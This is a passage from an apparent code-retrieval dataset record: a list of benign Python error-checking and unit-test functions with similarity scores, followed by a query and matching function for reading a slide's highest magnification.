len([i for i in range(len(TagsArrayTest)) if TagsArrayTest[i] != predEtiq[i]])", "def _check_input_data(self):\n\n n0, n1, corr, pval = np.nan, np.nan, np.nan, np.nan\n\n error_code_test = 0\n error_text_test = 'No error occurred'\n try:\n error_code_test, error_msg = self._check_notnull()\n if error_code_test == 0:\n error_code_test, error_msg, n0, n1 = self._check_group_obs(self.test_min_data)\n if error_code_test == 0:\n error_code_test, error_msg, corr, pval = \\\n self._check_spearman_corr(self.min_corr, self.max_p)\n if error_code_test != 0:\n error_text_test = str(error_msg)\n except:\n error_code_test = 9\n error_text_test = 'Unknown Error'\n\n self.checkstats = {'n0': n0, 'n1': n1, 'frame_spearmanR': corr, 'frame_corrPval': pval}\n\n self.error_code_test = error_code_test\n self.error_text_test = error_text_test\n\n return self.error_code_test, self.error_text_test", "def test_notebook_no_errors(executed_notebook):\n for c in executed_notebook[\"cells\"]:\n _assert_cell_no_errors(c)", "def runErrorTests(c, startNx, endNx, stepNx=1, display=False):\n errorsArray = []\n dxs = np.empty(shape=[0])\n iteration = 0\n\n for currNx in range(startNx, endNx, stepNx):\n nx = currNx\n nt = nx\n # initialize the vector of space points, our domain is [0,1]\n x = np.linspace(0, 1, nx)\n dxs = 
np.append(dxs, x[1] - x[0])\n #to check convergence use smooth function\n phi_ic = ic.cosineBasedFctn(x, 0.5)\n errline, _ = runAllSchemes(x, phi_ic, nx, nt, c)\n errorsArray = np.append(errorsArray, errline)\n iteration = iteration+1\n \n # to check order of convergence we see the behaviour of log-log plots\n # just for extra safety we check >0 for log\n dxLog = np.where(dxs>0, np.log10(dxs), 0)\n ErrorsLog = np.where(errorsArray>0, np.log10(errorsArray), 0)\n ErrorsLog = ErrorsLog.reshape(iteration, len(errline)) \n ErrorsLog = np.matrix.transpose(ErrorsLog)\n methods = [\"FTBS\", \"CTCS\", \"CNCS\", \"LaxWendroff\"]\n if(display):\n for i in range (0, 4):\n plt.plot(dxLog, ErrorsLog[i], label=methods[i])\n coeff = np.polyfit(dxLog,ErrorsLog[i],1)\n print(\"Estimated order of convergence for \"+methods[i]+\\\n \": \"+str(coeff[0]))\n plt.title(\"Log-log plot of L2 errors vs dx\\nc=\"+str(c))\n plt.legend(bbox_to_anchor=(1.05, 1), loc=2, borderaxespad=0.)\n plt.show()", "def check_and_print_if_error(self): # pragma: no cover\n dupes, empties, not_detected = self._get_aberrations()\n if dupes:\n print 'duplicate entries for:'\n for dup, matches in dupes:\n print ' %s: %s' % (dup, [f.func_name for f in matches])\n if empties:\n print 'empty entries for:'\n for empty in empties:\n print ' ' + str(empty)\n if not_detected:\n print 'dimensions not detected:'\n for n_d in not_detected:\n print ' ' + str(n_d)\n return self.is_correct", "def test_errors(self):\n DifferentRangePassage = self.text.getPassage(\n MyCapytain.common.reference.Reference(\"1.pr.2-1.2\")\n )\n with self.assertRaises(MyCapytain.errors.InvalidSiblingRequest, msg=\"Different range passage have no siblings\"):\n a = DifferentRangePassage.next\n\n with self.assertRaises(MyCapytain.errors.InvalidSiblingRequest, msg=\"Different range passage have no siblings\"):\n a = DifferentRangePassage.prev", "def test_call_incompatible_data(self):\r\n self.cs_overview.DistanceMatrices = [self.single_ele_dm,\r\n self.single_ele_dm]\r\n self.assertRaises(ValueError, self.cs_overview)", "def error_check(command):\r\n\r\n # TODO\r", "def _assert_cell_no_errors(c):\n if c[\"cell_type\"] != \"code\":\n return\n errors = [\n \"Error name: {}, Error Value: {}, trace: {}\".format(\n o[\"ename\"], o[\"evalue\"], \"\\n\".join(o.get(\"traceback\"))\n )\n for o in c[\"outputs\"]\n if o[\"output_type\"] == \"error\"\n ]\n\n if errors:\n pytest.fail(\"Found notebook errors: {}\".format(\"\\n\".join(errors)))", "def _compute_errors(self):\n self.errors = np.sqrt(self.data)\n self.errors[self.errors == 0.] 
= 1.", "def __call__(self, errors: List[float]) -> List[float]:", "def xerr(self, i):\n return self.errors[0][i]", "def errors_fatal(self) -> List[Error]:", "def test_error_case(self):\n with self.assertRaises(ValueError):\n list(math_helpers.divisors(0))\n\n with self.assertRaises(ValueError):\n list(math_helpers.divisors(-2))\n\n with self.assertRaises(ValueError):\n list(math_helpers.divisors(3.5))", "def test_center(self):\n\n self.assertTrue((self.cs.center == np.array([[0], [0]])).all())", "def error_calculation_test(self):\n dataOrg = [[1,1], [2,2], [3,3], [4,4], [5,5], [6,6], [7,8], [7.3, 5], [8, 0], [9,10]]\n dataCalc = [[1,3], [2,5], [3,0], [4,3], [5,5], [6.1,6], [7,3], [7.3, 5], [8, 0], [9,9]]\n # abs difference: 2 3 3 1 0 NA 5 0 NA 1\n # local errors: 200 150 200 50 0 NA 125 0 NA 20\n # sum: 745\n\n tsOrg = TimeSeries.from_twodim_list(dataOrg)\n tsCalc = TimeSeries.from_twodim_list(dataCalc)\n\n wmape = WeightedMeanAbsolutePercentageError()\n wmape.initialize(tsOrg, tsCalc)\n assert str(wmape.get_error())[:6] == \"93.125\"", "def test_error_aggregates_error_msg(self):\n logger = RepoLogger(__name__)\n RepoLogger.errors[:] = []\n\n logger.error(\"A full commitment's what I'm thinking of\")\n logger.error(\"You wouldn't get this from any other guy\")\n logger.error(\"I just wanna tell you how I'm feeling\")\n logger.error(\"Gotta make you understand\")\n\n self.assertEqual(\n RepoLogger.errors[:],\n [\n \"A full commitment's what I'm thinking of\",\n \"You wouldn't get this from any other guy\",\n \"I just wanna tell you how I'm feeling\",\n \"Gotta make you understand\",\n ],\n )", "def test_invalid_length(self):\n self.assertRaises(ValueError, chart.Chart, attributes={'class':'chart:bar'}, height=\"xxx\" )\n self.assertRaises(ValueError, chart.Chart, attributes={'class':'chart:bar'}, width=\"xxx\" )\n self.assertRaises(ValueError, draw.AreaCircle, cy=\"1cm\", cx=\"1cm\", r=\"xxx\" )\n self.assertRaises(ValueError, draw.AreaPolygon, height=\"1cm\", points=\"0,0 1,1\", y=\"1cm\", x=\"1cm\", viewbox=\"0 0 1000 1000\", width=\"xxx\" )\n self.assertRaises(ValueError, draw.AreaPolygon, height=\"1cm\", width=\"1cm\", points=\"0,0 1,1\", x=\"1cm\", viewbox=\"0 0 1000 1000\", y=\"xxx\" )\n self.assertRaises(ValueError, draw.AreaPolygon, height=\"1cm\", width=\"1cm\", points=\"0,0 1,1\", y=\"1cm\", viewbox=\"0 0 1000 1000\", x=\"xxx\" )\n self.assertRaises(ValueError, draw.AreaPolygon, width=\"1cm\", points=\"0,0 1,1\", y=\"1cm\", x=\"1cm\", viewbox=\"0 0 1000 1000\", height=\"xxx\" )\n self.assertRaises(ValueError, draw.AreaRectangle, x=\"1cm\", height=\"1cm\", width=\"1cm\", y=\"xxx\" )\n self.assertRaises(ValueError, draw.AreaRectangle, y=\"1cm\", height=\"1cm\", width=\"1cm\", x=\"xxx\" )\n self.assertRaises(ValueError, draw.AreaRectangle, y=\"1cm\", x=\"1cm\", height=\"1cm\", width=\"xxx\" )\n self.assertRaises(ValueError, draw.AreaRectangle, y=\"1cm\", x=\"1cm\", width=\"1cm\", height=\"xxx\" )\n self.assertRaises(ValueError, draw.ContourPath, recreateonedit=\"true\", viewbox=\"0 0 1000 1000\", d=\"1cm\", height=\"xxx\" )\n self.assertRaises(ValueError, draw.ContourPath, recreateonedit=\"true\", viewbox=\"0 0 1000 1000\", d=\"1cm\", width=\"xxx\" )\n self.assertRaises(ValueError, draw.ContourPolygon, points=\"0,0 1,1\", recreateonedit=\"true\", viewbox=\"0 0 1000 1000\", height=\"xxx\" )\n self.assertRaises(ValueError, draw.ContourPolygon, points=\"0,0 1,1\", recreateonedit=\"true\", viewbox=\"0 0 1000 1000\", width=\"xxx\" )\n self.assertRaises(ValueError, draw.Control, 
control=\"1cm\", endx=\"xxx\" )\n self.assertRaises(ValueError, draw.Control, control=\"1cm\", endy=\"xxx\" )\n self.assertRaises(ValueError, draw.Control, control=\"1cm\", height=\"xxx\" )\n self.assertRaises(ValueError, draw.Control, control=\"1cm\", width=\"xxx\" )\n self.assertRaises(ValueError, draw.Control, control=\"1cm\", x=\"xxx\" )\n self.assertRaises(ValueError, draw.Control, control=\"1cm\", y=\"xxx\" )\n self.assertRaises(ValueError, draw.FillImage, href=\"1cm\", name=\"1cm\", height=\"xxx\" )\n self.assertRaises(ValueError, draw.FillImage, href=\"1cm\", name=\"1cm\", width=\"xxx\" )\n self.assertRaises(ValueError, draw.GluePoint, x=\"1cm\", align=\"1cm\", id=\"1cm\", y=\"xxx\", escapedirection=\"right\" )\n self.assertRaises(ValueError, draw.GluePoint, y=\"1cm\", align=\"1cm\", id=\"1cm\", x=\"xxx\", escapedirection=\"right\" )\n self.assertRaises(ValueError, draw.Line, x2=\"1cm\", x1=\"1cm\", y2=\"1cm\", y1=\"xxx\" )\n self.assertRaises(ValueError, draw.Line, y1=\"1cm\", x1=\"1cm\", y2=\"1cm\", x2=\"xxx\" )\n self.assertRaises(ValueError, draw.Line, y1=\"1cm\", x2=\"1cm\", x1=\"1cm\", y2=\"xxx\" )\n self.assertRaises(ValueError, draw.Line, y1=\"1cm\", x2=\"1cm\", x1=\"1cm\", y2=\"1cm\", endx=\"xxx\" )\n self.assertRaises(ValueError, draw.Line, y1=\"1cm\", x2=\"1cm\", x1=\"1cm\", y2=\"1cm\", endy=\"xxx\" )\n self.assertRaises(ValueError, draw.Line, y1=\"1cm\", x2=\"1cm\", y2=\"1cm\", x1=\"xxx\" )\n self.assertRaises(ValueError, draw.Measure, x2=\"1cm\", x1=\"1cm\", y2=\"1cm\", y1=\"xxx\" )\n self.assertRaises(ValueError, draw.Measure, y1=\"1cm\", x1=\"1cm\", y2=\"1cm\", x2=\"xxx\" )\n self.assertRaises(ValueError, draw.Measure, y1=\"1cm\", x2=\"1cm\", x1=\"1cm\", y2=\"xxx\" )\n self.assertRaises(ValueError, draw.Measure, y1=\"1cm\", x2=\"1cm\", x1=\"1cm\", y2=\"1cm\", endx=\"xxx\" )\n self.assertRaises(ValueError, draw.Measure, y1=\"1cm\", x2=\"1cm\", x1=\"1cm\", y2=\"1cm\", endy=\"xxx\" )\n self.assertRaises(ValueError, draw.Measure, y1=\"1cm\", x2=\"1cm\", y2=\"1cm\", x1=\"xxx\" )\n self.assertRaises(ValueError, draw.Path, d=\"1cm\", viewbox=\"0 0 1000 1000\", endx=\"xxx\" )\n self.assertRaises(ValueError, draw.Path, d=\"1cm\", viewbox=\"0 0 1000 1000\", endy=\"xxx\" )\n self.assertRaises(ValueError, draw.Path, d=\"1cm\", viewbox=\"0 0 1000 1000\", height=\"xxx\" )\n self.assertRaises(ValueError, draw.Path, d=\"1cm\", viewbox=\"0 0 1000 1000\", width=\"xxx\" )\n self.assertRaises(ValueError, draw.Path, d=\"1cm\", viewbox=\"0 0 1000 1000\", x=\"xxx\" )\n self.assertRaises(ValueError, draw.Path, d=\"1cm\", viewbox=\"0 0 1000 1000\", y=\"xxx\" )\n self.assertRaises(ValueError, draw.Polygon, points=\"0,0 1,1\", viewbox=\"0 0 1000 1000\", endx=\"xxx\" )\n self.assertRaises(ValueError, draw.Polygon, points=\"0,0 1,1\", viewbox=\"0 0 1000 1000\", endy=\"xxx\" )\n self.assertRaises(ValueError, draw.Polygon, points=\"0,0 1,1\", viewbox=\"0 0 1000 1000\", height=\"xxx\" )\n self.assertRaises(ValueError, draw.Polygon, points=\"0,0 1,1\", viewbox=\"0 0 1000 1000\", width=\"xxx\" )\n self.assertRaises(ValueError, draw.Polygon, points=\"0,0 1,1\", viewbox=\"0 0 1000 1000\", x=\"xxx\" )\n self.assertRaises(ValueError, draw.Polygon, points=\"0,0 1,1\", viewbox=\"0 0 1000 1000\", y=\"xxx\" )\n self.assertRaises(ValueError, draw.Polyline, points=\"0,0 1,1\", viewbox=\"0 0 1000 1000\", endx=\"xxx\" )\n self.assertRaises(ValueError, draw.Polyline, points=\"0,0 1,1\", viewbox=\"0 0 1000 1000\", endy=\"xxx\" )\n self.assertRaises(ValueError, draw.Polyline, points=\"0,0 1,1\", viewbox=\"0 0 1000 
1000\", height=\"xxx\" )\n self.assertRaises(ValueError, draw.Polyline, points=\"0,0 1,1\", viewbox=\"0 0 1000 1000\", width=\"xxx\" )\n self.assertRaises(ValueError, draw.Polyline, points=\"0,0 1,1\", viewbox=\"0 0 1000 1000\", x=\"xxx\" )\n self.assertRaises(ValueError, draw.Polyline, points=\"0,0 1,1\", viewbox=\"0 0 1000 1000\", y=\"xxx\" )\n self.assertRaises(ValueError, draw.RegularPolygon, corners=\"1cm\", endx=\"xxx\" )\n self.assertRaises(ValueError, draw.RegularPolygon, corners=\"1cm\", endy=\"xxx\" )\n self.assertRaises(ValueError, draw.RegularPolygon, corners=\"1cm\", height=\"xxx\" )\n self.assertRaises(ValueError, draw.RegularPolygon, corners=\"1cm\", width=\"xxx\" )\n self.assertRaises(ValueError, draw.RegularPolygon, corners=\"1cm\", x=\"xxx\" )\n self.assertRaises(ValueError, draw.RegularPolygon, corners=\"1cm\", y=\"xxx\" )\n self.assertRaises(ValueError, draw.StrokeDash, name=\"1cm\", dots1length=\"xxx\" )\n self.assertRaises(ValueError, draw.StrokeDash, name=\"1cm\", dots2length=\"xxx\" )\n self.assertRaises(ValueError, presentation.Placeholder, x=\"1cm\", height=\"1cm\", object=\"1cm\", width=\"1cm\", y=\"xxx\" )\n self.assertRaises(ValueError, presentation.Placeholder, y=\"1cm\", height=\"1cm\", object=\"1cm\", width=\"1cm\", x=\"xxx\" )\n self.assertRaises(ValueError, presentation.Placeholder, y=\"1cm\", x=\"1cm\", height=\"1cm\", object=\"1cm\", width=\"xxx\" )\n self.assertRaises(ValueError, presentation.Placeholder, y=\"1cm\", x=\"1cm\", object=\"1cm\", width=\"1cm\", height=\"xxx\" )\n self.assertRaises(ValueError, style.Column, relwidth=\"1cm\", endindent=\"xxx\" )\n self.assertRaises(ValueError, style.Column, relwidth=\"1cm\", spaceafter=\"xxx\" )\n self.assertRaises(ValueError, style.Column, relwidth=\"1cm\", spacebefore=\"xxx\" )\n self.assertRaises(ValueError, style.Column, relwidth=\"1cm\", startindent=\"xxx\" )\n self.assertRaises(ValueError, style.Columns, columncount=\"1cm\", columngap=\"xxx\" )\n self.assertRaises(ValueError, style.TabStop, position=\"xxx\" )\n self.assertRaises(ValueError, svg.Lineargradient, name=\"1cm\", x1=\"xxx\" )\n self.assertRaises(ValueError, svg.Lineargradient, name=\"1cm\", x2=\"xxx\" )\n self.assertRaises(ValueError, svg.Lineargradient, name=\"1cm\", y1=\"xxx\" )\n self.assertRaises(ValueError, svg.Lineargradient, name=\"1cm\", y2=\"xxx\" )\n self.assertRaises(ValueError, svg.Radialgradient, name=\"1cm\", r=\"xxx\" )", "def initErrorCheck(self):\n #setup pvs to check\n self.error_bcs = \"BCS:MCC0:1:BEAMPMSV\"\n self.error_mps = \"SIOC:SYS0:ML00:CALCOUT989\"\n self.error_gaurdian = \"SIOC:SYS0:ML00:AO466\"\n self.error_und_tmit = \"BPMS:UND1:3290:TMITTH\"\n\n #pv to bypass the error pause\n self.error_bypass = \"SIOC:SYS0:ML00:CALCOUT990\"\n self.error_tripped = \"SIOC:SYS0:ML00:CALCOUT991\"\n\n #set the unlatch pv to zero\n epics.caput(self.error_bypass, 0)\n epics.caput(self.error_tripped,0)", "def test_check_map_errors(self):\r\n\r\n # Bad header\r\n self.assertRaises(ValueError, check_map,\r\n self.invalid_mapping_data_golay_header)\r\n # non DNA characters\r\n self.assertRaises(ValueError, check_map,\r\n self.invalid_mapping_data_golay_dna)\r\n # Duplicate barcodes\r\n self.assertRaises(ValueError, check_map,\r\n self.invalid_mapping_data_golay_dup_bcs)\r\n # Duplicate SampleIDs\r\n self.assertRaises(ValueError, check_map,\r\n self.invalid_mapping_data_golay_dup_sids)\r\n # More than one SampleID, no barcodes or added demultiplex specified\r\n self.assertRaises(ValueError, check_map,\r\n 
self.valid_mapping_data_no_bcs_added_demultiplex, barcode_type=0)\r\n # No barcodes, added_demultiplex has duplicates\r\n self.assertRaises(ValueError, check_map,\r\n self.invalid_mapping_data_no_bcs_added_demultiplex, barcode_type=0,\r\n added_demultiplex_field=\"Added_Demultiplex\")\r\n # Barcodes plus added demultiplex results in duplications\r\n self.assertRaises(ValueError, check_map,\r\n self.invalid_mapping_data_bcs_added_demultiplex,\r\n added_demultiplex_field=\"Added_Demultiplex\")\r\n # Missing a barcode\r\n self.assertRaises(ValueError, check_map,\r\n self.invalid_mapping_data_golay_missing_bc,\r\n barcode_type=\"variable_length\")", "def ensure_valid_data():\n cursor = connection.cursor()\n cursor.execute(\"SELECT id, name, st_area(geom) FROM firestation_firedepartment where st_area(geom)>6.99\")\n messages = []\n\n for id, name, area in cursor.fetchall():\n messages.append('{0} ({1}) has an area of {2}.'.format(name, id, area))\n\n if messages:\n mail_admins('Invalid Geometries Detected', message='\\n'.join(messages))\n\n cursor.execute(\"SELECT COUNT(*) FROM genericm2m_relatedobject;\")\n generic_count = cursor.fetchone()\n\n if generic_count[0] < 2940:\n generic_count_message = \"Related government units has dropped below 2,940.\"\n mail_admins('Low number of government units alert.', message=generic_count_message)", "def test_should_raise_in_case_of_wrong_initials(self):\n validator = StartsWithValidator()\n\n for formula in self.wrong_formulas:\n with self.assertRaises(FormulaValidationError):\n validator(formula)", "def test_kraus_error(self):\n A0 = [[1, 0], [0, np.sqrt(1 - 0.3)]]\n A1 = [[0, 0], [0, np.sqrt(0.3)]]\n targets = [A0, A1]\n error = kraus_error(targets)\n circ, p = error.error_term(0)\n self.assertEqual(p, 1)\n kraus = circ[0]\n self.assertEqual(kraus['name'], 'kraus')\n self.assertEqual(kraus['qubits'], [0])\n for op in kraus['params']:\n self.remove_if_found(op, targets)\n self.assertEqual(targets, [], msg=\"Incorrect kraus QuantumError\")", "def test_cds_invalid_coordinates(self):\n for i in (-10, -1, 6, 100):\n self.assertIsNone(self.t.cds_coordinate_to_chromosome(i))\n self.assertIsNone(self.t.cds_coordinate_to_transcript(i))", "def test_cds_invalid_coordinates(self):\n for i in (-10, -1, 6, 100):\n self.assertIsNone(self.t.cds_coordinate_to_chromosome(i))\n self.assertIsNone(self.t.cds_coordinate_to_transcript(i))", "def test_invalid_request_values(self):\n TEST_DATA = [\n (-100, 0, 0, 0),\n (100, 0, 0, 0),\n (0, -190, 0, 0),\n (0, 190, 0, 0),\n (0, 0, 0, -10),\n (0, 0, 0, 370)\n ] # yapf: disable\n for (lat, lon, alt, heading) in TEST_DATA:\n self.assertEqual(400,\n self.eval_request_values(lat, lon, alt, heading))", "def checkResultsCorrection(self, result, valid_keys):\n for key in result:\n if key not in valid_keys:\n print(\"[ERROR] Key '%s' does not exist.\" % key)\n return False\n return True", "def listErrors(individual): #TODO: add other errors implemented elsewhere\n\n results = [birthBeforeMarriage(individual), birthBeforeDeath(individual), marriageBeforeDeath(individual), \n datesBeforeCurrentDate(individual), noBigamy(individual)]\n results = [x for x in results if x is not None]\n return not all(results)", "def check_validity(self):", "def test_cds_invalid_coordinates(self):\n for i in (-10, -1, 4, 100):\n self.assertIsNone(self.t.cds_coordinate_to_chromosome(i))\n self.assertIsNone(self.t.cds_coordinate_to_transcript(i))", "def errorCheck(self):\n\t\twhile 1:\n #check for bad state\n\t\t\tif epics.caget(self.error_bypass) == 
1:\n\t\t\t\tout_msg=\"Bypass flag is TRUE\"\n elif epics.caget(self.error_bcs) != 1:\n out_msg=\"BCS tripped\"\n elif epics.caget(self.error_mps) != 0:\n out_msg=\"MPS tripped\"\n elif epics.caget(self.error_gaurdian) != 0:\n out_msg=\"Gaurdian tripped\"\n\t\t\n #elif epics.caget(self.error_und_tmit) < 5.0e7:\n # out_msg=\"UND Tmit Low\"\n else:\n out_msg='Everything Okay'\n\n #exit if the stop button is set\n #if not self.mi.getter.caget(\"SIOC:SYS0:ML03:AO702\"):\n\t\t\tif not epics.caget(\"SIOC:SYS0:ML03:AO702\"):\n break\n\n #set the error check message\n epics.caput (\"SIOC:SYS0:ML00:CA000\",out_msg)\n print out_msg\n\n #break out if error check is bypassed\n if (out_msg==\"Bypass flag is TRUE\"):\n break\n\n #break out if everything is okay\n if (out_msg==\"Everything Okay\"):\n epics.caput(self.error_tripped,0)\n break\n\t\t\t\t#return\n else:\n epics.caput(self.error_tripped,1)\n time.sleep(0.1)", "def test_err(self, start: Result[int, str], exp: Option[str]) -> None:\n assert start.err() == exp", "def test_value_init7(self):\n with self.assertRaises(ValueError) as err:\n r1 = Rectangle(-4, 5)\n msg = \"width must be > 0\"\n self.assertEqual(str(err.exception), msg)", "def testCCHalt(self):\n cdl_convert.config.HALT_ON_ERROR = True\n\n def getCC():\n self.ccr_bad.cc\n\n self.assertRaises(\n ValueError,\n getCC\n )", "def test_051128_invalid(self):\n spc = parser(get_file('PTSDY1_biggeom2.txt'))\n # spc.draw_outlooks()\n spc.sql(self.txn)\n outlook = spc.get_outlook('WIND', 'SIGN', 1)\n self.assertTrue(outlook.geometry.is_empty)\n self.assertEquals(len(spc.warnings), 2, \"\\n\".join(spc.warnings))", "def test_execution_errors():\n with temporary_dir() as output_dir:\n copyfile(\n TEST_ROBOT_OUTPUT_FILES / \"robot_with_import_errors.xml\",\n Path(output_dir) / \"output.xml\",\n )\n robot_importer.import_robot_test_results(FlowTaskFactory(), output_dir)\n\n test_result = models.TestResult.objects.last()\n root = ET.fromstring(test_result.robot_xml)\n msg_elements = root.findall(\"./errors/msg\")\n error_messages = [element.text for element in msg_elements]\n\n expected_error_messages = [\n # note: these are glob patterns, not regexes\n \"Error in file '*' on line 2: Library setting requires value.\",\n \"Error in file '*' on line 3: Resource setting requires value.\",\n ]\n assert len(error_messages) == len(expected_error_messages)\n for pattern in expected_error_messages:\n assert len(fnmatch.filter(error_messages, pattern)) == 1", "def test_bad_values(self):\n self.assertOK([60])\n self.assertRaisesInternalError([59.9])\n self.assertRaisesInternalError([''])\n self.assertRaisesInternalError([';'])\n self.assertRaisesInternalError(['('])\n self.assertRaisesInternalError([None])", "def test_errors(self):\n self.assertRaises(TypeError, columnize, 5, 'reject input - not array')\n return", "def test_init(self):\n # test invalid normalized_items\n with self.assertRaisesRegex(\n KeyError, \"Should be one of 'bbox', 'head', 'torso'\"):\n MpiiPCKAccuracy(norm_item='invalid')", "def CheckErrors(self, index=None):\n loc = 'Coordinated video timing block %s' % ('#%d' % index if index else '')\n errors = []\n\n # Check that preferred refresh rate is supported\n if self.preferred_vertical_rate not in self.supported_vertical_rates:\n errors.append(error.Error(loc, 'Preferred refresh rate not supported',\n '%s supported' % self.preferred_vertical_rate,\n 'Supported: %s' %\n self.supported_vertical_rates))\n\n # Check for reserved 0 bits\n if self._block[1] & 0x03:\n # Error: Bits 1-0 of byte 2 in 
CVT should be set to '00'\n errors.append(error.Error(loc, 'Bits 1-0 of byte 2 incorrectly set',\n 0x00, self._block[1] & 0x03))\n\n if self._block[2] & 0x80:\n # Error: Bit 7 of byte 3 in CVT should be set to '0'\n errors.append(error.Error(loc, 'Bit 7 of byte 3 incorrectly set', 0x00,\n self._block[2] & 0x80))\n\n return errors", "def errors(self):\n return self.args[1]", "def validate():", "def test_invalid_filter_shape(self):\r\n self.assertRaises(AssertionError, self.validate,\r\n (3, 2, 8, 8), (4, 3, 5, 5),\r\n 'valid')", "def test_results_errors(self, affiliate_items):\n updater = mock.Mock(side_effect=ValueError())\n batch_job = BatchJob(affiliate_items, updater)\n\n error_count = 0\n for result in batch_job.run():\n error_count += int(result.is_error)\n\n assert error_count == 4", "def test_PerfectModel_verify_comparison_keyerrors(\n perfectModelEnsemble_initialized_control, comparison\n):\n with pytest.raises(KeyError) as excinfo:\n perfectModelEnsemble_initialized_control.verify(\n comparison=comparison,\n metric=\"mse\",\n dim=[],\n )\n assert \"Specify comparison from\" in str(excinfo.value)", "def check_set_errors(self):\n response = self.read()\n return [] if response == \"\" else [response]", "def test_error(self):\n metric = self.metric()\n measurement = self.measurement(metric, sources=[self.source(metric, parse_error=\"error\")])\n self.assertEqual(None, measurement[\"count\"][\"value\"])", "def nzErr(xerr, yerr, vxerr, vyerr, year_x, year_y, mag, alnDir = '13_08_21/', chainsDir = 'efit/chains_S0-2_newRV2/'):\n\n #Read in values for error in position and velocity of sgr*\n origin_val = asciidata.open('/g/ghez/align/' + alnDir + chainsDir + 'efit_summary.txt')\n ori_x0e = origin_val[25][0]\n ori_y0e = origin_val[26][0]\n ori_vxe = origin_val[27][0]\n ori_vye = origin_val[28][0]\n t_0 = 2000.0 #hard coded t_0 of sgr*\n\n # magBins=np.array([9,11,12,13,14,15,16,17,18,19,20,21])\n # deltaArr=np.array([3.5,71.0,58.0,210.0,300.0,650.0,700.0,1100.0,1900.0,2200.0,3000.0])*1e-6\n\n# delta = mag*0.0\n# for i in range(len(mag)):\n# for j in range(len(deltaArr)):\n# if ((mag[i] > magBins[j]) & (mag[i] <= magBins[j+1])):\n# delta[i]=deltaArr[j]\n\n#pdb.set_trace()\n\n #Update errors\n xerr = np.sqrt(xerr**2 + ori_x0e**2 + ((year_x - t_0)*ori_vxe)**2)\n yerr = np.sqrt(yerr**2 + ori_y0e**2 + ((year_y - t_0)*ori_vye)**2)\n vxerr = np.sqrt(vxerr**2 + ori_vxe**2)\n vyerr = np.sqrt(vyerr**2 + ori_vye**2)\n\n return xerr, yerr, vxerr, vyerr", "def validError(treenode, impurity_crit, validSet):\n\t\t\tif treenode.cut_off is None:\n\t\t\t\tif len(validSet):\n\t\t\t\t\tif impurity_crit == DecisionTree._MSE:\n\t\t\t\t\t\treturn np.sum( np.square( validSet[:, -1] - treenode.value ) )\n\t\t\t\t\telse:\n\t\t\t\t\t\treturn np.sum( validSet[:,-1] != treenode.value ) / len(validSet)\n\t\t\t\telse:\n\t\t\t\t\treturn 0.0\n\n\t\t\tD1, D2 = DecisionTree._binarySplit(validSet, *treenode.cut_off)\n\t\t\tleft_err = validError(treenode.left, impurity_crit, D1)\n\t\t\tright_err = validError(treenode.right, impurity_crit, D2)\n\n\t\t\treturn left_err + right_err", "def test_check_cds_11(self):\n self.cds1.start = -1\n import_genome.check_cds(self.cds1, self.eval_flags)\n count = count_status(self.cds1, \"error\")\n self.assertEqual(count, 1)", "def test_check_cds_12(self):\n self.cds1.stop = -1\n import_genome.check_cds(self.cds1, self.eval_flags)\n count = count_status(self.cds1, \"error\")\n self.assertEqual(count, 1)", "def test_failed_because_errors(self):\n with self.assertRaisesRegex(AssertionError,\n 
'The follow messages were unexpectedly logged:\\n'\n ' ERROR:root:Divide by zero!\\n'\n ' ERROR:root:It is really not a good idea.'):\n with self.assertRaises(ZeroDivisionError):\n logging.getLogger().error(\n 'Should not be in AssertError before it was logged '\n 'with \"with self.assertNoLogs()\"')\n with self.assertNoLogs():\n divide_by(10, 0)", "def test_init(self):\n # test invalid normalized_items\n with self.assertRaisesRegex(\n KeyError, \"Should be one of 'bbox', 'head', 'torso'\"):\n PCKAccuracy(norm_item='invalid')", "def _checkErrors(self, landPage):\n noLicenseTags = ['Purchase a Subscription',\n 'Purchase This Content',\n 'to gain access to this content',\n 'purchaseItem',\n 'Purchase Full Text',\n 'Purchase access',\n 'Purchase PDF',\n 'Pay Per Article',\n 'Purchase this article.',\n 'Online access to the content you have requested requires one of the following',\n 'To view this item, select one of the options below',\n 'PAY PER VIEW',\n 'This article requires a subscription.',\n 'leaf-pricing-buy-now',\n 'To access this article, please choose from the options below',\n 'Buy this article',\n 'Your current credentials do not allow retrieval of the full text.',\n 'Access to the content you have requested requires one of the following:',\n 'Online access to the content you have requested requires one of the following']\n if pageContains(landPage, noLicenseTags):\n logging.info(\"generic crawler found 'No license' on \" + landPage['url'])\n raise pubGetError('No License', 'noLicense', landPage['url'])\n errTags = ['This may be the result of a broken link',\n 'please verify that the link is correct',\n 'Sorry, we could not find the page you were looking for',\n 'We are now performing maintenance',\n 'DOI cannot be found in the DOI System']\n if pageContains(landPage, errTags):\n raise pubGetError('Error Message', 'errorMessage', landPage['url'])" ]
[ "0.68639857", "0.65659684", "0.6317057", "0.6280998", "0.624511", "0.62418723", "0.6231955", "0.6174314", "0.6160829", "0.6155387", "0.6125272", "0.61134624", "0.6105969", "0.60783327", "0.606288", "0.60506743", "0.604379", "0.6016345", "0.60074997", "0.6006396", "0.6003036", "0.5999768", "0.5980903", "0.5960872", "0.59525925", "0.5939286", "0.59228396", "0.5922243", "0.59138477", "0.59055305", "0.59030175", "0.5900376", "0.5899146", "0.5898229", "0.5893499", "0.58922726", "0.5881319", "0.58798444", "0.587429", "0.58731097", "0.58655345", "0.5856782", "0.5834021", "0.5833644", "0.58259577", "0.5817749", "0.58156997", "0.58139807", "0.5813697", "0.5797828", "0.57788426", "0.57751155", "0.5765215", "0.57581055", "0.57469225", "0.57466316", "0.57413006", "0.5735201", "0.57272196", "0.5724981", "0.5723203", "0.57157385", "0.5712788", "0.5707272", "0.5700087", "0.56969064", "0.56955403", "0.5695398", "0.5693497", "0.56868386", "0.56868386", "0.56859326", "0.5676572", "0.56753564", "0.5674813", "0.5673428", "0.5667035", "0.56643844", "0.5661131", "0.56559306", "0.5654298", "0.564797", "0.5646413", "0.56422025", "0.5640338", "0.56395143", "0.56297815", "0.56251127", "0.5623634", "0.5622698", "0.56202793", "0.56200314", "0.561971", "0.56155646", "0.56105214", "0.5609502", "0.56064075", "0.56030494", "0.5602576", "0.5602303" ]
0.73111194
0
Returns the highest magnification for the slide
def highest_mag(slide): return int(slide.properties['aperio.AppMag'])
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
